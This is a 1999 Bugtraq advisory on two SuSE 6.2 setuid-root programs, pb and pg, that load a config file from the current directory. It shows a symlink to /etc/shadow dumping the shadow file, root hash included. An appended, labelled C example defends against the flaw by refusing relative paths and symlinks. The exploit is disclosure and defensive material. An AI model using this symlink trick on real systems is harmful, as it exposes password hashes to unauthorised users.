Bugtraq mailing list archives

Two SuSE 6.2 local root exploits
From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:06:24 -0500


Greetings,

    /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow
any user to read any file on the system as shown:

susebox:/root # ls -la /usr/bin/pb
uname -rwsr-xr-x   1 root     root        23544 Jul 22 20:07 /usr/bin/pb

susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX)                  = 0
getpid()                                = 16623
brk(0)                                  = 0x805032c
brk(0x80504cc)                          = 0x80504cc
brk(0x8051000)                          = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble?   = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1)                                = ?
susebox:/root #

---
xnec () susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec () susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec () susebox:/tmp > pb
Unknown config line :  <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line :  <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line :  <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line :  <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file

The same scenario for /usr/bin/pg's pg.conf in your cwd.  These two
programs also contain numerous buffer overflows and other insecure file
i/o and should obviously lose their suid bits.  They cannot operate
correctly without their s-bits unless they are run by root, but no one
besides root will run them anyway.  These programs are not worth
patching.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
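
The following is an added example, not part of the original post or of the pb/pg sources: a hardened config open for a privileged program that refuses the relative-path and symlink cases shown above. The function names `open_trusted_config` and `demo_symlink_errno` are hypothetical, the scratch directory is constructed for the demonstration, and Linux `O_NOFOLLOW` semantics (`ELOOP` on a symlink) are assumed.

```c
/* Added example; function names are hypothetical, not from pb/pg. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open a config file on behalf of a privileged program.
 * Returns an fd, or -1 with errno set when the file is refused.
 * O_NOFOLLOW covers only the last path component, so the path must
 * live in a directory that only the trusted owner can write. */
int open_trusted_config(const char *path, uid_t owner)
{
    struct stat st;
    int fd;
    if (path == NULL || path[0] != '/') {  /* never resolve against cwd */
        errno = EINVAL;
        return -1;
    }
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                         /* ELOOP: last component is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EPERM;                     /* wrong type, owner or mode */
        return -1;
    }
    return fd;
}

/* Constructed scenario: a symlink named pb.conf in a scratch directory,
 * as in the post. Returns the errno of the refusal (0 if it was opened). */
int demo_symlink_errno(void)
{
    char dir[] = "/tmp/pbdemoXXXXXX", lnk[64];
    int fd, err;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(lnk, sizeof lnk, "%s/pb.conf", dir);
    if (symlink("/etc/shadow", lnk) != 0) return -1;
    fd = open_trusted_config(lnk, geteuid());
    err = (fd < 0) ? errno : 0;
    if (fd >= 0) close(fd);
    unlink(lnk);
    rmdir(dir);
    return err;
}

int main(void) { printf("symlink errno: %d\n", demo_symlink_errno()); return 0; }
```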
